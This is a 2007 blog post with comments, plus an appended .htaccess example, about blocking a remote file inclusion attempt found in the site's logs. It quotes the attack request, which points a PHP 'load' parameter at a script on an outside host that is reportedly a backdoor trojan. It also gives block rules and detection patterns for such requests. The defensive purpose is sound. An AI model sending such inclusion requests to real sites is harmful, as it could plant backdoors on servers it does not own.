Hack Attempt?
Sat, 17 March, 2007 – 1:19 am
After just running through my stats to see if there are any further holes I can close to limit bandwidth (yes I'm still on this subject!) I noticed the following had been visited in various guises
/pages.php?load=http://stoerlein.de/images/kgb.c?
Looking at the site that's referenced, it contains a whole web page mainly constructed of PHP (and Frontpage as the generator!!). However, naturally I'm concerned as it's not a hack I recognise. So far the attempts I've seen have just produced a 404; however, without knowing what this script does, it may run on the right (or in my case, wrong) file.
So now I'm trying to work out (and have already been for another reason too) how to use htaccess to read the REQUEST_URI and identify that if a certain string is contained within it then I can return a 403. Unfortunately I've not had much luck yet.
It's worth checking your stats over once in a while. You never know what you may notice.


Hmm okay I got my first problem solved (after a day of searching and trying everything I could find or think of!). Yet the same method doesn't want to work for blocking this hack attempt.
I have
RedirectMatch 410 ^(.*)stoerlein.de.*$
RedirectMatch 410 ^(.*)/trackback/$
The second line works for any trackback URL on a post on this site (which have all been heavily spammed and are now just skewing my stats). However the first line doesn't do anything. I'm only guessing what the above means so it could be badly wrong!
Anyone a htaccess expert out there?
By Sarah on Sat, 17 March, 2007
That dot separating the TLD and domain name may need escaping
By David Salisbury on Mon, 19 March, 2007
Further to that I'm not sure that you can use query strings with the various Redirect directives. You may need to use something like this:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)stoerlein.de.*$
RewriteRule .* - [G]
By David Salisbury on Mon, 19 March, 2007
Cheers Dave, I'll give that a go
By Sarah on Tue, 20 March, 2007
Unfortunately the rewrite didn't work despite there being no reason for it not working. Probably the numerous other lines of spam blocking I have in my htaccess!
Anyhow, PHP to the rescue and in good time as I've had 40 hits today alone with this script from various domains. Apparently it's a backdoor trojan according to a friend's firewall so clearly not a nice script. Still, it's blocked for now. I'll post up the code in the morning.
I've also had to block visitors with empty user agents (sorry to anyone who has this but I've not spotted any in my server logs). The site was getting hammered today by some bot, so there's another block in place.
It makes me wonder whether it's worth keeping the site running with receiving more bots than humans as visitors!
By Sarah on Tue, 20 March, 2007
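The query-string match suggested in David's comment, together with the empty user-agent block mentioned in the last comment, written out as an added example. This is not the blog's own .htaccess nor either commenter's configuration; it assumes mod_rewrite is enabled and that AllowOverride permits it in .htaccess.

```apache
# Added example, not the blog author's or the commenter's own .htaccess.
# Assumes mod_rewrite is loaded and AllowOverride FileInfo (or All) applies here.
RewriteEngine On

# Why the original RedirectMatch did nothing: Redirect/RedirectMatch only see the
# URL path, never the query string, so ^(.*)stoerlein.de.*$ can never match
# ?load=http://stoerlein.de/images/kgb.c? and the request is passed through.
# RewriteCond can test the query string directly. The dot is escaped so it means
# a literal "." and [NC] makes the match case-insensitive. [F] returns 403,
# which is the response the post was trying to produce.
RewriteCond %{QUERY_STRING} stoerlein\.de [NC]
RewriteRule .* - [F,L]

# Blocking one hostname only stops one copy of the script; the same attempt
# arrived from "various domains". Any parameter value that starts with an
# absolute URL (plain or percent-encoded) is a remote inclusion attempt, so
# refuse those regardless of which host is named.
RewriteCond %{QUERY_STRING} (^|&)[^=]*=(https?|ftp)(://|%3A%2F%2F) [NC]
RewriteRule .* - [F,L]

# Requests with an empty User-Agent header (the bot traffic in the last comment).
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* - [F,L]

# Trackback URLs live in the path, so a path-only directive is fine for them.
RedirectMatch 410 /trackback/$
```

Rule order matters: mod_rewrite directives in .htaccess are evaluated before RedirectMatch, so a request is refused by the first RewriteCond/RewriteRule pair that matches.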